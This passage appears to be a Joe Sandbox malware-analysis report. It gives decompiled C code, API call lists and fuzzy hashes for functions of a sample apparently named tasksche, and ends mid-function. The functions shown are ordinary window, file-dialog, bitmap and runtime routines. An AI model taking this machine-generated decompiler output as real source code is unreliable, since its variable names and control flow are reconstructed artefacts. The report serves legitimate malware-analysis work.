                                                                                              				MapWindowPoints(0, GetParent(_t61),  &_v20, 2);
                                                                                              				_t41 =  *(_t69 + 4);
                                                                                              				if(_t41 != 0) {
                                                                                              					DestroyWindow(_t41);
                                                                                              				}
                                                                                              				_t42 = _v20.x;
                                                                                              				_a20 = _t42 + 1;
                                                                                              				_t46 = CreateWindowExW(0, L"RarHtmlClassName", 0, 0x40000000, _a20, _v20.y, _v12 - _t42, _v8 - _v20.y, GetParent(_a8), 0,  *_t69, _t69);
                                                                                              				 *(_t69 + 4) = _t46;
                                                                                              				if( *((intOrPtr*)(_t69 + 0x10)) != 0) {
                                                                                              					__eflags = _t46;
                                                                                              					if(_t46 != 0) {
                                                                                              						ShowWindow(_t46, 5);
                                                                                              						_t46 = UpdateWindow( *(_t69 + 4));
                                                                                              					}
                                                                                              					__eflags =  *((intOrPtr*)(_t69 + 0x20)) - 0x64;
                                                                                              					if( *((intOrPtr*)(_t69 + 0x20)) > 0x64) {
                                                                                              						_t46 = E004192D0(_t69);
                                                                                              					}
                                                                                              				} else {
                                                                                              					if(_a8 != 0 &&  *((intOrPtr*)(_t69 + 0x18)) == 0) {
                                                                                              						_t46 =  *(_t69 + 0x14);
                                                                                              						_t79 = _t46;
                                                                                              						if(_t46 != 0) {
                                                                                              							_push(_t46);
                                                                                              							_t46 = E0041947D(_t52, _t69, _t79);
                                                                                              							_t71 = _t46;
                                                                                              							_t80 = _t71;
                                                                                              							if(_t71 != 0) {
                                                                                              								ShowWindow(_a8, 5);
                                                                                              								SetWindowTextW(_a8, _t71);
                                                                                              								_push(_t71);
                                                                                              								_t46 = E0041A506(_t52, 0, _t71, _t80);
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t46;
                                                                                              			}

















                                                                                              0x00419aa9
                                                                                              0x00419aac
                                                                                              0x00419ab1
                                                                                              0x00419ab4
                                                                                              0x00419ab7
                                                                                              0x00419ac2
                                                                                              0x00419aca
                                                                                              0x00419ad0
                                                                                              0x00419ad8
                                                                                              0x00419ade
                                                                                              0x00419af0
                                                                                              0x00419af6
                                                                                              0x00419afb
                                                                                              0x00419afe
                                                                                              0x00419afe
                                                                                              0x00419b04
                                                                                              0x00419b18
                                                                                              0x00419b3b
                                                                                              0x00419b41
                                                                                              0x00419b47
                                                                                              0x00419b86
                                                                                              0x00419b88
                                                                                              0x00419b8d
                                                                                              0x00419b96
                                                                                              0x00419b96
                                                                                              0x00419b9c
                                                                                              0x00419ba0
                                                                                              0x00419ba4
                                                                                              0x00419ba4
                                                                                              0x00419b49
                                                                                              0x00419b4c
                                                                                              0x00419b53
                                                                                              0x00419b56
                                                                                              0x00419b58
                                                                                              0x00419b5a
                                                                                              0x00419b5d
                                                                                              0x00419b62
                                                                                              0x00419b64
                                                                                              0x00419b66
                                                                                              0x00419b6d
                                                                                              0x00419b77
                                                                                              0x00419b7d
                                                                                              0x00419b7e
                                                                                              0x00419b83
                                                                                              0x00419b66
                                                                                              0x00419b58
                                                                                              0x00419b4c
                                                                                              0x00419bad

                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000,00000000,?,?), ref: 00419AB7
                                                                                                • Part of subcall function 00419A36: LoadCursorW.USER32(00000000,00007F00), ref: 00419A6D
                                                                                                • Part of subcall function 00419A36: RegisterClassExW.USER32 ref: 00419A8E
                                                                                              • GetWindowRect.USER32 ref: 00419AD8
                                                                                              • GetParent.USER32(?), ref: 00419AEB
                                                                                              • MapWindowPoints.USER32 ref: 00419AF0
                                                                                              • DestroyWindow.USER32(?), ref: 00419AFE
                                                                                              • GetParent.USER32(?), ref: 00419B1C
                                                                                              • CreateWindowExW.USER32 ref: 00419B3B
                                                                                              • ShowWindow.USER32(?,00000005,?), ref: 00419B6D
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00419B77
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00419B8D
                                                                                              • UpdateWindow.USER32(?), ref: 00419B96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3841971108-1658105358
                                                                                              • Opcode ID: 6c641d0ff31dc14dd7b3caf662548c90144b8a356fed134c41ac5bc1dd73445d
                                                                                              • Instruction ID: a0655035169e6554100d25c4e6de203faa719369231219c5c88fda93c074337e
                                                                                              • Opcode Fuzzy Hash: 6c641d0ff31dc14dd7b3caf662548c90144b8a356fed134c41ac5bc1dd73445d
                                                                                              • Instruction Fuzzy Hash: 0331B035600604EFCB319F65EC48EAFBBB9FF44700F10451AF91692260D735AD51DBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E00405164(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, char _a20) {
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v60;
                                                                                              				short* _v64;
                                                                                              				char* _v80;
                                                                                              				intOrPtr _v84;
                                                                                              				intOrPtr _v88;
                                                                                              				char _v92;
                                                                                              				char _v1116;
                                                                                              				void* __edi;
                                                                                              				signed int _t40;
                                                                                              				intOrPtr _t44;
                                                                                              				signed int _t48;
                                                                                              				signed int _t57;
                                                                                              				void* _t61;
                                                                                              				signed int _t62;
                                                                                              				void* _t64;
                                                                                              				char _t65;
                                                                                              				short* _t66;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				void* _t69;
                                                                                              				signed int _t76;
                                                                                              
                                                                                              				_t63 =  &_v1116;
                                                                                              				if(_a16 != 0) {
                                                                                              					E0041A7F7( &_v1116, _a16);
                                                                                              					_t67 = _t68 + E0041A7AF( &_v1116) * 2 - 0x456;
                                                                                              					E0041A7F7(_t67, _a16);
                                                                                              					_t57 = E0041A7AF(_t67);
                                                                                              					_t69 = _t69 + 0x18;
                                                                                              					_t63 = _t67 + 2 + _t57 * 2;
                                                                                              				}
                                                                                              				E0041A7F7(_t63, E0040C3BF(0xa2));
                                                                                              				_t64 = _t63 + 2 + E0041A7AF(_t63) * 2;
                                                                                              				E0041A7F7(_t64, 0x42a570);
                                                                                              				_t40 = E0041A7AF(_t64);
                                                                                              				 *((short*)(_t64 + 2 + _t40 * 2)) = 0;
                                                                                              				_t65 = 0x58;
                                                                                              				E0041A820(_t61,  &_v92, 0, _t65);
                                                                                              				_v88 = _a4;
                                                                                              				_t44 =  *0x4335a8; // 0x400000
                                                                                              				_v84 = _t44;
                                                                                              				_v80 =  &_v1116;
                                                                                              				_v92 = _t65;
                                                                                              				_t66 = _a12;
                                                                                              				_v44 = _a8;
                                                                                              				_v64 = _t66;
                                                                                              				_v60 = 0x800;
                                                                                              				_v40 = 0x1080c;
                                                                                              				_push( &_v92);
                                                                                              				if(_a20 == 0) {
                                                                                              					_t48 = GetOpenFileNameW();
                                                                                              				} else {
                                                                                              					_t48 = GetSaveFileNameW();
                                                                                              				}
                                                                                              				_t62 = _t48;
                                                                                              				if(_t62 == 0) {
                                                                                              					_t48 = CommDlgExtendedError();
                                                                                              					if(_t48 == 0x3002) {
                                                                                              						 *_t66 = 0;
                                                                                              						_push( &_v92);
                                                                                              						if(_a20 == 0) {
                                                                                              							_t48 = GetOpenFileNameW();
                                                                                              						} else {
                                                                                              							_t48 = GetSaveFileNameW();
                                                                                              						}
                                                                                              						_t62 = _t48;
                                                                                              					}
                                                                                              					_t76 = _t62;
                                                                                              				}
                                                                                              				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                              			}


























                                                                                              0x00405174
                                                                                              0x0040517a
                                                                                              0x00405182
                                                                                              0x00405192
                                                                                              0x0040519a
                                                                                              0x004051a0
                                                                                              0x004051a5
                                                                                              0x004051a8
                                                                                              0x004051a8
                                                                                              0x004051b8
                                                                                              0x004051c3
                                                                                              0x004051cd
                                                                                              0x004051d3
                                                                                              0x004051dc
                                                                                              0x004051e1
                                                                                              0x004051e8
                                                                                              0x004051f6
                                                                                              0x004051f9
                                                                                              0x004051fe
                                                                                              0x00405207
                                                                                              0x00405214
                                                                                              0x00405217
                                                                                              0x0040521a
                                                                                              0x00405220
                                                                                              0x00405223
                                                                                              0x0040522a
                                                                                              0x00405231
                                                                                              0x00405232
                                                                                              0x0040523c
                                                                                              0x00405234
                                                                                              0x00405234
                                                                                              0x00405234
                                                                                              0x0040523e
                                                                                              0x00405242
                                                                                              0x00405244
                                                                                              0x0040524f
                                                                                              0x00405257
                                                                                              0x0040525d
                                                                                              0x0040525e
                                                                                              0x00405268
                                                                                              0x00405260
                                                                                              0x00405260
                                                                                              0x00405260
                                                                                              0x0040526a
                                                                                              0x0040526a
                                                                                              0x0040526c
                                                                                              0x0040526c
                                                                                              0x00405275

                                                                                              APIs
                                                                                              • _wcscpy.LIBCMT ref: 00405182
                                                                                              • _wcslen.LIBCMT ref: 0040518A
                                                                                              • _wcscpy.LIBCMT ref: 0040519A
                                                                                              • _wcslen.LIBCMT ref: 004051A0
                                                                                              • _wcscpy.LIBCMT ref: 004051B8
                                                                                              • _wcslen.LIBCMT ref: 004051BE
                                                                                              • _wcscpy.LIBCMT ref: 004051CD
                                                                                              • _wcslen.LIBCMT ref: 004051D3
                                                                                              • _memset.LIBCMT ref: 004051E8
                                                                                              • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405234
                                                                                              • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040523C
                                                                                              • CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 00405244
                                                                                              • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405260
                                                                                              • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405268
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3496903968-0
                                                                                              • Opcode ID: 446a76bb310dad6e5806d0052d9e568853349a282fe8c87d623ef543e340e0f8
                                                                                              • Instruction ID: 017447a648ceccb586da1f31f92202068c03838f3088d87860c47b682a039f1a
                                                                                              • Opcode Fuzzy Hash: 446a76bb310dad6e5806d0052d9e568853349a282fe8c87d623ef543e340e0f8
                                                                                              • Instruction Fuzzy Hash: D531D775901618ABCB11AFA5DC45ACF7BB8EF04314F00002AF904B7281DB38DA958FAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00419D0B(void* _a4, signed int _a8, int _a12) {
                                                                                              				struct HDC__* _v8;
                                                                                              				struct HDC__* _v12;
                                                                                              				struct HBITMAP__* _v16;
                                                                                              				void* _v20;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				void _v44;
                                                                                              				struct HDC__* _t36;
                                                                                              				signed int _t43;
                                                                                              				struct HDC__* _t54;
                                                                                              
                                                                                              				_t36 = GetDC(0);
                                                                                              				_v12 = _t36;
                                                                                              				_t54 = CreateCompatibleDC(_t36);
                                                                                              				_v8 = CreateCompatibleDC(_v12);
                                                                                              				GetObjectW(_a4, 0x18,  &_v44);
                                                                                              				asm("cdq");
                                                                                              				_t43 = _v36 * _a8 / _v40;
                                                                                              				if(_t43 < _a12) {
                                                                                              					_a12 = _t43;
                                                                                              				}
                                                                                              				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                              				_a4 = SelectObject(_t54, _a4);
                                                                                              				_v20 = SelectObject(_v8, _v16);
                                                                                              				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                              				SelectObject(_t54, _a4);
                                                                                              				SelectObject(_v8, _v20);
                                                                                              				DeleteDC(_t54);
                                                                                              				DeleteDC(_v8);
                                                                                              				ReleaseDC(0, _v12);
                                                                                              				return _v16;
                                                                                              			}













                                                                                              0x00419d17
                                                                                              0x00419d24
                                                                                              0x00419d2c
                                                                                              0x00419d30
                                                                                              0x00419d3c
                                                                                              0x00419d49
                                                                                              0x00419d4a
                                                                                              0x00419d50
                                                                                              0x00419d52
                                                                                              0x00419d52
                                                                                              0x00419d6e
                                                                                              0x00419d76
                                                                                              0x00419d86
                                                                                              0x00419d9a
                                                                                              0x00419da4
                                                                                              0x00419dac
                                                                                              0x00419db5
                                                                                              0x00419dba
                                                                                              0x00419dc0
                                                                                              0x00419dcd

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00419D17
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00419D27
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00419D2E
                                                                                              • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,00419EBD,00000200,?,?), ref: 00419D3C
                                                                                              • CreateCompatibleBitmap.GDI32(?,00000200,00419EBD), ref: 00419D5E
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00419D71
                                                                                              • SelectObject.GDI32(?,00000200), ref: 00419D7C
                                                                                              • StretchBlt.GDI32(?,00000000,00000000,00000200,00419EBD,00000000,00000000,00000000,?,?,00CC0020), ref: 00419D9A
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00419DA4
                                                                                              • SelectObject.GDI32(?,00419EBD), ref: 00419DAC
                                                                                              • DeleteDC.GDI32(00000000), ref: 00419DB5
                                                                                              • DeleteDC.GDI32(?), ref: 00419DBA
                                                                                              • ReleaseDC.USER32 ref: 00419DC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                              • String ID:
                                                                                              • API String ID: 3950507155-0
                                                                                              • Opcode ID: c5f4d7ef721d9f2cf6d28cde0393e927751e3943138dffdaa34ce4f2faff49d0
                                                                                              • Instruction ID: fe64683af8def945f8560e9c967618457674570685148338231d72a037962566
                                                                                              • Opcode Fuzzy Hash: c5f4d7ef721d9f2cf6d28cde0393e927751e3943138dffdaa34ce4f2faff49d0
                                                                                              • Instruction Fuzzy Hash: C021A076900218FFCF129FA1DC48DDEBFBAFB48350B104466F914A2120C7369A65EFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E0041E854(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				struct HINSTANCE__* _t23;
                                                                                              				intOrPtr _t28;
                                                                                              				intOrPtr _t32;
                                                                                              				intOrPtr _t45;
                                                                                              				void* _t46;
                                                                                              
                                                                                              				_t35 = __ebx;
                                                                                              				_push(0xc);
                                                                                              				_push(0x42d8a0);
                                                                                              				E0041FA9C(__ebx, __edi, __esi);
                                                                                              				_t44 = L"KERNEL32.DLL";
                                                                                              				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                              				if(_t23 == 0) {
                                                                                              					_t23 = E00421465(_t44);
                                                                                              				}
                                                                                              				 *(_t46 - 0x1c) = _t23;
                                                                                              				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                              				 *((intOrPtr*)(_t45 + 0x5c)) = 0x42ba00;
                                                                                              				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                              				if(_t23 != 0) {
                                                                                              					_t35 = GetProcAddress;
                                                                                              					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                              					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                              				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                              				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                              				 *(_t45 + 0x68) = 0x430880;
                                                                                              				E0041EFA3(_t35, 0xd);
                                                                                              				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                              				InterlockedIncrement( *(_t45 + 0x68));
                                                                                              				 *(_t46 - 4) = 0xfffffffe;
                                                                                              				E0041E929();
                                                                                              				E0041EFA3(_t35, 0xc);
                                                                                              				 *(_t46 - 4) = 1;
                                                                                              				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                              				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                              				if(_t28 == 0) {
                                                                                              					_t32 =  *0x430e88; // 0x430db0
                                                                                              					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                                                                                              				}
                                                                                              				E004221AD( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                              				 *(_t46 - 4) = 0xfffffffe;
                                                                                              				return E0041FAE1(E0041E932());
                                                                                              			}








                                                                                              0x0041e854
                                                                                              0x0041e854
                                                                                              0x0041e856
                                                                                              0x0041e85b
                                                                                              0x0041e860
                                                                                              0x0041e866
                                                                                              0x0041e86e
                                                                                              0x0041e871
                                                                                              0x0041e876
                                                                                              0x0041e877
                                                                                              0x0041e87a
                                                                                              0x0041e87d
                                                                                              0x0041e887
                                                                                              0x0041e88c
                                                                                              0x0041e894
                                                                                              0x0041e89c
                                                                                              0x0041e8ac
                                                                                              0x0041e8ac
                                                                                              0x0041e8b2
                                                                                              0x0041e8b5
                                                                                              0x0041e8bc
                                                                                              0x0041e8c3
                                                                                              0x0041e8cc
                                                                                              0x0041e8d2
                                                                                              0x0041e8d9
                                                                                              0x0041e8df
                                                                                              0x0041e8e6
                                                                                              0x0041e8ed
                                                                                              0x0041e8f3
                                                                                              0x0041e8f6
                                                                                              0x0041e8f9
                                                                                              0x0041e8fe
                                                                                              0x0041e900
                                                                                              0x0041e905
                                                                                              0x0041e905
                                                                                              0x0041e90b
                                                                                              0x0041e911
                                                                                              0x0041e922

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D8A0,0000000C,0041E98F,00000000,00000000,?,0041FE78,0041A9BA,?,?,?,0041A9BA,00000000,?), ref: 0041E866
                                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 0041E871
                                                                                                • Part of subcall function 00421465: Sleep.KERNEL32(000003E8,00000000,?,0041E7B7,KERNEL32.DLL,?,0041E803,?,0041FE78,0041A9BA,?,?,?,0041A9BA,00000000,?), ref: 00421471
                                                                                                • Part of subcall function 00421465: GetModuleHandleW.KERNEL32(00000000,?,0041E7B7,KERNEL32.DLL,?,0041E803,?,0041FE78,0041A9BA,?,?,?,0041A9BA,00000000,?), ref: 0042147A
                                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E89A
                                                                                              • GetProcAddress.KERNEL32(0041A9BA,DecodePointer), ref: 0041E8AA
                                                                                              • __lock.LIBCMT ref: 0041E8CC
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 0041E8D9
                                                                                              • __lock.LIBCMT ref: 0041E8ED
                                                                                              • ___addlocaleref.LIBCMT ref: 0041E90B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                              • API String ID: 1028249917-2843748187
                                                                                              • Opcode ID: d8a1d3b64ce03b740c9770e28a10d8a3d1cb693a8f1fd6d09f99049fe87b25f8
                                                                                              • Instruction ID: 28857185edf288c115030afddfc21b3ad53991f12277c54fa87cb1ac16e0dfb5
                                                                                              • Opcode Fuzzy Hash: d8a1d3b64ce03b740c9770e28a10d8a3d1cb693a8f1fd6d09f99049fe87b25f8
                                                                                              • Instruction Fuzzy Hash: 82119071A40701AFD720AF36D805B9EBBE0AF44314F60456FE8A997290CB78A981CF5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E0040F0C2(void* __edi) {
                                                                                              				long __ebx;
                                                                                              				intOrPtr _t263;
                                                                                              				void* _t264;
                                                                                              				void* _t335;
                                                                                              				short* _t337;
                                                                                              				void* _t339;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					if( *((intOrPtr*)(_t339 + 0x10)) != 6) {
                                                                                              						goto L160;
                                                                                              					} else {
                                                                                              						__eax = 0;
                                                                                              						 *(__ebp - 0x2440) = __ax;
                                                                                              						__eax =  *(__ebp - 0x1bc90) & 0x0000ffff;
                                                                                              						__eax = E0041D265( *(__ebp - 0x1bc90) & 0x0000ffff);
                                                                                              						_push(__ebx);
                                                                                              						__eflags = __eax - 0x50;
                                                                                              						if(__eax == 0x50) {
                                                                                              							_push(0x43f822);
                                                                                              							__eax = __ebp - 0x2440;
                                                                                              							_push(__ebp - 0x2440);
                                                                                              							__eax = E00410B9C();
                                                                                              							 *(__ebp - 0x18) = 2;
                                                                                              						} else {
                                                                                              							__eflags = __eax - 0x54;
                                                                                              							__eax = __ebp - 0x2440;
                                                                                              							if(__eflags == 0) {
                                                                                              								_push(0x43e822);
                                                                                              								_push(__eax);
                                                                                              								__eax = E00410B9C();
                                                                                              								 *(__ebp - 0x18) = 7;
                                                                                              							} else {
                                                                                              								_push(0x440822);
                                                                                              								_push(__eax);
                                                                                              								__eax = E00410B9C();
                                                                                              								 *(__ebp - 0x18) = 0x10;
                                                                                              							}
                                                                                              						}
                                                                                              						__eax = 0;
                                                                                              						 *(__ebp - 0xbc90) = __ax;
                                                                                              						 *(__ebp - 0x4c40) = __ax;
                                                                                              						__ebp - 0x19c90 = __ebp - 0x6c88;
                                                                                              						__eax = E0041A7F7(__ebp - 0x6c88, __ebp - 0x19c90);
                                                                                              						__eflags =  *(__ebp - 0x6c88) - 0x22;
                                                                                              						_pop(__ecx);
                                                                                              						_pop(__ecx);
                                                                                              						if( *(__ebp - 0x6c88) != 0x22) {
                                                                                              							__ebp - 0x6c88 = E004092A5(__ebp - 0x6c88);
                                                                                              							__eflags = __al;
                                                                                              							if(__al != 0) {
                                                                                              								goto L145;
                                                                                              							}
                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
                                                                                              							__eflags =  *(__ebp - 0x6c88);
                                                                                              							__edi = __ebp - 0x6c88;
                                                                                              							if( *(__ebp - 0x6c88) == 0) {
                                                                                              								goto L145;
                                                                                              							} else {
                                                                                              								goto L133;
                                                                                              							}
                                                                                              							do {
                                                                                              								L133:
                                                                                              								__eax = __edi->i & 0x0000ffff;
                                                                                              								__eflags = __ax - 0x20;
                                                                                              								if(__ax == 0x20) {
                                                                                              									L135:
                                                                                              									__esi = __ax & 0x0000ffff;
                                                                                              									__eax = 0;
                                                                                              									__edi->i = __ax;
                                                                                              									__ebp - 0x6c88 = E004092A5(__ebp - 0x6c88);
                                                                                              									__eflags = __al;
                                                                                              									if(__al == 0) {
                                                                                              										__edi->i = __si;
                                                                                              										goto L142;
                                                                                              									}
                                                                                              									 *(__ebp - 0x10) = __edi;
                                                                                              									__eflags = __si - 0x2f;
                                                                                              									if(__si != 0x2f) {
                                                                                              										do {
                                                                                              											__edi =  &(__edi->i);
                                                                                              											__edi =  &(__edi->i);
                                                                                              											__eflags = __edi->i - 0x20;
                                                                                              										} while (__edi->i == 0x20);
                                                                                              										_push(__edi);
                                                                                              										__eax = __ebp - 0x4c40;
                                                                                              										L140:
                                                                                              										E0041A7F7() =  *(__ebp - 0x10);
                                                                                              										__ecx = __eax;
                                                                                              										_pop(__ecx);
                                                                                              										 *( *(__ebp - 0x10)) = __si;
                                                                                              										goto L142;
                                                                                              									}
                                                                                              									__eax = 0x2f;
                                                                                              									 *(__ebp - 0x4c40) = __ax;
                                                                                              									__eax =  &(__edi->i);
                                                                                              									_push( &(__edi->i));
                                                                                              									__eax = __ebp - 0x4c3e;
                                                                                              									goto L140;
                                                                                              								}
                                                                                              								__eflags = __ax - 0x2f;
                                                                                              								if(__ax != 0x2f) {
                                                                                              									goto L142;
                                                                                              								}
                                                                                              								goto L135;
                                                                                              								L142:
                                                                                              								__edi =  &(__edi->i);
                                                                                              								__edi =  &(__edi->i);
                                                                                              								__eflags = __edi->i;
                                                                                              							} while (__edi->i != 0);
                                                                                              							__eflags =  *(__ebp - 0x10);
                                                                                              							if( *(__ebp - 0x10) != 0) {
                                                                                              								__ecx =  *(__ebp - 0x10);
                                                                                              								__eax = 0;
                                                                                              								__eflags = 0;
                                                                                              								 *( *(__ebp - 0x10)) = __ax;
                                                                                              							}
                                                                                              							goto L145;
                                                                                              						} else {
                                                                                              							__ebp - 0x19c8e = __ebp - 0x6c88;
                                                                                              							E0041A7F7(__ebp - 0x6c88, __ebp - 0x19c8e) = __ebp - 0x6c86;
                                                                                              							__eax = E0041CA29(__ebp - 0x6c86, 0x22);
                                                                                              							__eflags = __eax;
                                                                                              							if(__eax != 0) {
                                                                                              								__ecx = 0;
                                                                                              								 *__eax = __cx;
                                                                                              								__ebp - 0x4c40 = E0041A7F7(__ebp - 0x4c40, __ebp - 0x4c40);
                                                                                              								_pop(__ecx);
                                                                                              								_pop(__ecx);
                                                                                              							}
                                                                                              							L145:
                                                                                              							__esi = 0;
                                                                                              							__eflags =  *((intOrPtr*)(__ebp - 0x11c90)) - __si;
                                                                                              							if( *((intOrPtr*)(__ebp - 0x11c90)) != __si) {
                                                                                              								__ebp - 0xbc90 = __ebp - 0x11c90;
                                                                                              								__eax = E0040A9CB(__edi, __ebp - 0x11c90, __ebp - 0xbc90, __ebx);
                                                                                              							}
                                                                                              							__ebp - 0xcc90 = __ebp - 0x6c88;
                                                                                              							__eax = E0040A9CB(__edi, __ebp - 0x6c88, __ebp - 0xcc90, __ebx);
                                                                                              							__eflags =  *(__ebp - 0x2440) - __si;
                                                                                              							if(__eflags == 0) {
                                                                                              								__ebp - 0x2440 = E0040D212(__ecx, __ebp - 0x2440,  *(__ebp - 0x18));
                                                                                              							}
                                                                                              							__ebp - 0x2440 = E0040A116(__eflags, __ebp - 0x2440, __ebx);
